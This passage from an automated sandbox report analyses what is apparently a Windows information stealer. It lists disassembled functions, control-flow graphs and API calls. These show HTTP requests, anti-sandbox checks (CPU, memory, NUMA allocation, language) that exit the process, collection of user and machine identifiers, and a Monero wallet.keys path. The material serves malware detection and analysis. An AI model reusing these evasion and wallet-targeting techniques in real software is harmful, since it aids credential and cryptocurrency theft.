                        • Opcode ID: c6add33b8a4cb0953905f2816cef1921e34bb5f6397cc63ec7236071e203faca
                        • Instruction ID: 5404ec51843d8dfa0fecc272476dd734d63b68e83e97b86a8417415ef49ee764
                        • Opcode Fuzzy Hash: c6add33b8a4cb0953905f2816cef1921e34bb5f6397cc63ec7236071e203faca
                        • Instruction Fuzzy Hash: 78625FB9500210AFC395EFA8ED889667FF9F78E701704853EA609C3264D739D865CF1A
                        Function 00266280 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 191networkfileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1033 266280-26630b call 27a7a0 call 2647b0 call 27a740 InternetOpenA StrCmpCA 1040 266314-266318 1033->1040 1041 26630d 1033->1041 1042 26631e-266342 InternetConnectA 1040->1042 1043 266509-266525 call 27a7a0 call 27a800 * 2 1040->1043 1041->1040 1045 2664ff-266503 InternetCloseHandle 1042->1045 1046 266348-26634c 1042->1046 1062 266528-26652d 1043->1062 1045->1043 1047 26634e-266358 1046->1047 1048 26635a 1046->1048 1050 266364-266392 HttpOpenRequestA 1047->1050 1048->1050 1052 2664f5-2664f9 InternetCloseHandle 1050->1052 1053 266398-26639c 1050->1053 1052->1045 1055 2663c5-266405 HttpSendRequestA HttpQueryInfoA 1053->1055 1056 26639e-2663bf InternetSetOptionA 1053->1056 1058 266407-266427 call 27a740 call 27a800 * 2 1055->1058 1059 26642c-26644b call 278940 1055->1059 1056->1055 1058->1062 1066 26644d-266454 1059->1066 1067 2664c9-2664e9 call 27a740 call 27a800 * 2 1059->1067 1069 266456-266480 InternetReadFile 1066->1069 1070 2664c7-2664ef InternetCloseHandle 1066->1070 1067->1062 1073 266482-266489 1069->1073 1074 26648b 1069->1074 1070->1052 1073->1074 1078 26648d-2664c5 call 27a9b0 call 27a8a0 call 27a800 1073->1078 1074->1070 1078->1069
                        APIs
                          • Part of subcall function 0027A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0027A7E6
                          • Part of subcall function 002647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00264839
                          • Part of subcall function 002647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00264849
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                        • InternetOpenA.WININET(00280DFE,00000001,00000000,00000000,00000000), ref: 002662E1
                        • StrCmpCA.SHLWAPI(?,00E2EA78), ref: 00266303
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00266335
                        • HttpOpenRequestA.WININET(00000000,GET,?,00E2DE60,00000000,00000000,00400100,00000000), ref: 00266385
                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 002663BF
                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002663D1
                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 002663FD
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0026646D
                        • InternetCloseHandle.WININET(00000000), ref: 002664EF
                        • InternetCloseHandle.WININET(00000000), ref: 002664F9
                        • InternetCloseHandle.WININET(00000000), ref: 00266503
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                        • String ID: ERROR$ERROR$GET$x
                        • API String ID: 3749127164-2392039165
                        • Opcode ID: b0944e53030d94712f020ccf00c3e1e780d5e389d4e2bba2394d40ec2fe21e5a
                        • Instruction ID: b6021b80f466d8cef84b9da64304bd8283c78d468f7a9a184729b964dd537bb9
                        • Opcode Fuzzy Hash: b0944e53030d94712f020ccf00c3e1e780d5e389d4e2bba2394d40ec2fe21e5a
                        • Instruction Fuzzy Hash: 09713275A20218EBDB24DFA0DC49BEEB778FB45700F108198F50A6B1D0DBB46A95CF52
                        Function 00275510 Relevance: 24.9, APIs: 7, Strings: 7, Instructions: 383sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1090 275510-275577 call 275ad0 call 27a820 * 3 call 27a740 * 4 1106 27557c-275583 1090->1106 1107 2755d7-27564c call 27a740 * 2 call 261590 call 2752c0 call 27a8a0 call 27a800 call 27aad0 StrCmpCA 1106->1107 1108 275585-2755b6 call 27a820 call 27a7a0 call 261590 call 2751f0 1106->1108 1133 275693-2756a9 call 27aad0 StrCmpCA 1107->1133 1138 27564e-27568e call 27a7a0 call 261590 call 2751f0 call 27a8a0 call 27a800 1107->1138 1124 2755bb-2755d2 call 27a8a0 call 27a800 1108->1124 1124->1133 1140 2756af-2756b6 1133->1140 1141 2757dc-275844 call 27a8a0 call 27a820 * 2 call 261670 call 27a800 * 4 call 276560 call 261550 1133->1141 1138->1133 1144 2756bc-2756c3 1140->1144 1145 2757da-27585f call 27aad0 StrCmpCA 1140->1145 1270 275ac3-275ac6 1141->1270 1149 2756c5-275719 call 27a820 call 27a7a0 call 261590 call 2751f0 call 27a8a0 call 27a800 1144->1149 1150 27571e-275793 call 27a740 * 2 call 261590 call 2752c0 call 27a8a0 call 27a800 call 27aad0 StrCmpCA 1144->1150 1164 275865-27586c 1145->1164 1165 275991-2759f9 call 27a8a0 call 27a820 * 2 call 261670 call 27a800 * 4 call 276560 call 261550 1145->1165 1149->1145 1150->1145 1250 275795-2757d5 call 27a7a0 call 261590 call 2751f0 call 27a8a0 call 27a800 1150->1250 1171 275872-275879 1164->1171 1172 27598f-275a14 call 27aad0 StrCmpCA 1164->1172 1165->1270 1180 2758d3-275948 call 27a740 * 2 call 261590 call 2752c0 call 27a8a0 call 27a800 call 27aad0 StrCmpCA 1171->1180 1181 27587b-2758ce call 27a820 call 27a7a0 call 261590 call 2751f0 call 27a8a0 call 27a800 1171->1181 1201 275a16-275a21 Sleep 1172->1201 1202 275a28-275a91 call 27a8a0 call 27a820 * 2 call 261670 call 27a800 * 4 call 276560 call 261550 1172->1202 1180->1172 1275 27594a-27598a call 27a7a0 call 261590 call 2751f0 call 27a8a0 call 27a800 1180->1275 1181->1172 1201->1106 1202->1270 1250->1145 1275->1172
                        APIs
                          • Part of subcall function 0027A820: lstrlen.KERNEL32(00264F05,?,?,00264F05,00280DDE), ref: 0027A82B
                          • Part of subcall function 0027A820: lstrcpy.KERNEL32(00280DDE,00000000), ref: 0027A885
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00275644
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 002756A1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00275857
                          • Part of subcall function 0027A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0027A7E6
                          • Part of subcall function 002751F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00275228
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                          • Part of subcall function 002752C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00275318
                          • Part of subcall function 002752C0: lstrlen.KERNEL32(00000000), ref: 0027532F
                          • Part of subcall function 002752C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00275364
                          • Part of subcall function 002752C0: lstrlen.KERNEL32(00000000), ref: 00275383
                          • Part of subcall function 002752C0: lstrlen.KERNEL32(00000000), ref: 002753AE
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0027578B
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00275940
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00275A0C
                        • Sleep.KERNEL32(0000EA60), ref: 00275A1B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen$Sleep
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$pT
                        • API String ID: 507064821-2397427275
                        • Opcode ID: 9bbeff0a6c858d9cfe39af0a6b11807c8305a8a4d0c177e5009778b8d03063ce
                        • Instruction ID: 6881da4e1855348e7e60975bde5318d23cb03c0b6fa9a071bb53dfe778a9464b
                        • Opcode Fuzzy Hash: 9bbeff0a6c858d9cfe39af0a6b11807c8305a8a4d0c177e5009778b8d03063ce
                        • Instruction Fuzzy Hash: 78E13E71930104AACB18FBB0DC93AEEB738AB95310F50C528B51B56091EF746A39CF97
                        Function 002717A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1301 2717a0-2717cd call 27aad0 StrCmpCA 1304 2717d7-2717f1 call 27aad0 1301->1304 1305 2717cf-2717d1 ExitProcess 1301->1305 1309 2717f4-2717f8 1304->1309 1310 2719c2-2719cd call 27a800 1309->1310 1311 2717fe-271811 1309->1311 1313 271817-27181a 1311->1313 1314 27199e-2719bd 1311->1314 1316 271821-271830 call 27a820 1313->1316 1317 2718cf-2718e0 StrCmpCA 1313->1317 1318 27198f-271999 call 27a820 1313->1318 1319 2718ad-2718be StrCmpCA 1313->1319 1320 271849-271858 call 27a820 1313->1320 1321 271835-271844 call 27a820 1313->1321 1322 271913-271924 StrCmpCA 1313->1322 1323 271932-271943 StrCmpCA 1313->1323 1324 2718f1-271902 StrCmpCA 1313->1324 1325 271951-271962 StrCmpCA 1313->1325 1326 271970-271981 StrCmpCA 1313->1326 1327 27187f-271890 StrCmpCA 1313->1327 1328 27185d-27186e StrCmpCA 1313->1328 1314->1309 1316->1314 1329 2718e2-2718e5 1317->1329 1330 2718ec 1317->1330 1318->1314 1350 2718c0-2718c3 1319->1350 1351 2718ca 1319->1351 1320->1314 1321->1314 1333 271926-271929 1322->1333 1334 271930 1322->1334 1335 271945-271948 1323->1335 1336 27194f 1323->1336 1331 271904-271907 1324->1331 1332 27190e 1324->1332 1337 271964-271967 1325->1337 1338 27196e 1325->1338 1340 271983-271986 1326->1340 1341 27198d 1326->1341 1348 271892-27189c 1327->1348 1349 27189e-2718a1 1327->1349 1346 271870-271873 1328->1346 1347 27187a 1328->1347 1329->1330 1330->1314 1331->1332 1332->1314 1333->1334 1334->1314 1335->1336 1336->1314 1337->1338 1338->1314 1340->1341 1341->1314 1346->1347 1347->1314 1355 2718a8 1348->1355 1349->1355 1350->1351 1351->1314 1355->1314
                        APIs
                        • StrCmpCA.SHLWAPI(00000000,block), ref: 002717C5
                        • ExitProcess.KERNEL32 ref: 002717D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID: block
                        • API String ID: 621844428-2199623458
                        • Opcode ID: e2f8f04bd5576c6f31f213759077f00abf54b6f446c35292362e2b9af7785420
                        • Instruction ID: 9fc18ae148e5a1315efd0d1efe59f7c2f2c1d097aa6f2a11d9c0cd17839f0e47
                        • Opcode Fuzzy Hash: e2f8f04bd5576c6f31f213759077f00abf54b6f446c35292362e2b9af7785420
                        • Instruction Fuzzy Hash: C351A2B4A24209EFDB04EFA4D994ABE77B5FF45304F10C058E50967280D774E976CB62
                        Function 00277500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1356 277500-27754a GetWindowsDirectoryA 1357 277553-2775c7 GetVolumeInformationA call 278d00 * 3 1356->1357 1358 27754c 1356->1358 1365 2775d8-2775df 1357->1365 1358->1357 1366 2775e1-2775fa call 278d00 1365->1366 1367 2775fc-277617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 277619-277626 call 27a740 1367->1369 1370 277628-277658 wsprintfA call 27a740 1367->1370 1377 27767e-27768e 1369->1377 1370->1377
                        APIs
                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00277542
                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0027757F
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00277603
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0027760A
                        • wsprintfA.USER32 ref: 00277640
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                        • String ID: :$C$\$(
                        • API String ID: 1544550907-2811700069
                        • Opcode ID: 6ff629cacf273bdc27af5762c689d4fe3208ee8c4864328afda24cd06b44ea5b
                        • Instruction ID: 435193f457c8f013c06f05a3c853d7bb5fe5412cb4154c91cb4965234076545e
                        • Opcode Fuzzy Hash: 6ff629cacf273bdc27af5762c689d4fe3208ee8c4864328afda24cd06b44ea5b
                        • Instruction Fuzzy Hash: B141B4B1D14258ABDF10DFA4DC45BEEBBB8EF08700F104098F50967280D778AA54CFA5
                        Function 002769F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00279860: GetProcAddress.KERNEL32(74DD0000,00E22338), ref: 002798A1
                          • Part of subcall function 00279860: GetProcAddress.KERNEL32(74DD0000,00E22290), ref: 002798BA
                          • Part of subcall function 00279860: GetProcAddress.KERNEL32(74DD0000,00E22278), ref: 002798D2
                          • Part of subcall function 00279860: GetProcAddress.KERNEL32(74DD0000,00E22410), ref: 002798EA
                          • Part of subcall function 00279860: GetProcAddress.KERNEL32(74DD0000,00E223E0), ref: 00279903
                          • Part of subcall function 00279860: GetProcAddress.KERNEL32(74DD0000,00E290B0), ref: 0027991B
                          • Part of subcall function 00279860: GetProcAddress.KERNEL32(74DD0000,00E155B0), ref: 00279933
                          • Part of subcall function 00279860: GetProcAddress.KERNEL32(74DD0000,00E15230), ref: 0027994C
                          • Part of subcall function 00279860: GetProcAddress.KERNEL32(74DD0000,00E221A0), ref: 00279964
                          • Part of subcall function 00279860: GetProcAddress.KERNEL32(74DD0000,00E22398), ref: 0027997C
                          • Part of subcall function 00279860: GetProcAddress.KERNEL32(74DD0000,00E22158), ref: 00279995
                          • Part of subcall function 00279860: GetProcAddress.KERNEL32(74DD0000,00E222A8), ref: 002799AD
                          • Part of subcall function 00279860: GetProcAddress.KERNEL32(74DD0000,00E152F0), ref: 002799C5
                          • Part of subcall function 00279860: GetProcAddress.KERNEL32(74DD0000,00E221B8), ref: 002799DE
                          • Part of subcall function 0027A740: lstrcpy.KERNEL32(00280E17,00000000), ref: 0027A788
                          • Part of subcall function 002611D0: ExitProcess.KERNEL32 ref: 00261211
                          • Part of subcall function 00261160: GetSystemInfo.KERNEL32(?), ref: 0026116A
                          • Part of subcall function 00261160: ExitProcess.KERNEL32 ref: 0026117E
                          • Part of subcall function 00261110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0026112B
                          • Part of subcall function 00261110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00261132
                          • Part of subcall function 00261110: ExitProcess.KERNEL32 ref: 00261143
                          • Part of subcall function 00261220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0026123E
                          • Part of subcall function 00261220: __aulldiv.LIBCMT ref: 00261258
                          • Part of subcall function 00261220: __aulldiv.LIBCMT ref: 00261266
                          • Part of subcall function 00261220: ExitProcess.KERNEL32 ref: 00261294
                          • Part of subcall function 00276770: GetUserDefaultLangID.KERNEL32 ref: 00276774
                          • Part of subcall function 00261190: ExitProcess.KERNEL32 ref: 002611C6
                          • Part of subcall function 00277850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,002611B7), ref: 00277880
                          • Part of subcall function 00277850: RtlAllocateHeap.NTDLL(00000000), ref: 00277887
                          • Part of subcall function 00277850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0027789F
                          • Part of subcall function 002778E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00277910
                          • Part of subcall function 002778E0: RtlAllocateHeap.NTDLL(00000000), ref: 00277917
                          • Part of subcall function 002778E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0027792F
                          • Part of subcall function 0027A9B0: lstrlen.KERNEL32(?,00E28E80,?,\Monero\wallet.keys,00280E17), ref: 0027A9C5
                          • Part of subcall function 0027A9B0: lstrcpy.KERNEL32(00000000), ref: 0027AA04
                          • Part of subcall function 0027A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0027AA12
                          • Part of subcall function 0027A8A0: lstrcpy.KERNEL32(?,00280E17), ref: 0027A905
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00E29170,?,0028110C,?,00000000,?,00281110,?,00000000,00280AEF), ref: 00276ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00276AE8
                        • CloseHandle.KERNEL32(00000000), ref: 00276AF9
                        • Sleep.KERNEL32(00001770), ref: 00276B04
                        • CloseHandle.KERNEL32(?,00000000,?,00E29170,?,0028110C,?,00000000,?,00281110,?,00000000,00280AEF), ref: 00276B1A
                        • ExitProcess.KERNEL32 ref: 00276B22
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                        • String ID:
                        • API String ID: 2525456742-0
                        • Opcode ID: 1ba55cab43a61f11093bc095d89b34be90be61231c961e8e5ad0e7fb1d2e1811
                        • Instruction ID: 39ec8549ae9984a5e335cb684837000cf103b8234fb4c4ce5c50c1f9e9212060
                        • Opcode Fuzzy Hash: 1ba55cab43a61f11093bc095d89b34be90be61231c961e8e5ad0e7fb1d2e1811
                        • Instruction Fuzzy Hash: 43310D71920208AADB04FBF0DC57BEE7778AF45350F108528F21AA6191DF706975CFA6
                        Function 00261220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1436 261220-261247 call 2789b0 GlobalMemoryStatusEx 1439 261273-26127a 1436->1439 1440 261249-261271 call 27da00 * 2 1436->1440 1441 261281-261285 1439->1441 1440->1441 1443 261287 1441->1443 1444 26129a-26129d 1441->1444 1446 261292-261294 ExitProcess 1443->1446 1447 261289-261290 1443->1447 1447->1444 1447->1446
                        APIs
                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0026123E
                        • __aulldiv.LIBCMT ref: 00261258
                        • __aulldiv.LIBCMT ref: 00261266
                        • ExitProcess.KERNEL32 ref: 00261294
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                        • String ID: @
                        • API String ID: 3404098578-2766056989
                        • Opcode ID: 4ad248fff1e50833595f9255f7e442f82a983cfd2e1ce3991060df7dfab40564
                        • Instruction ID: e5bcb6720f7045c2c504581132de1c336b5a465d14888a97bd10d1bc41304f61
                        • Opcode Fuzzy Hash: 4ad248fff1e50833595f9255f7e442f82a983cfd2e1ce3991060df7dfab40564
                        • Instruction Fuzzy Hash: E60162B0D50308FAEB10DFE0CC49B9EBB78BF04701F248454EB05B62C0D77465A58B59
                        Function 00276AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
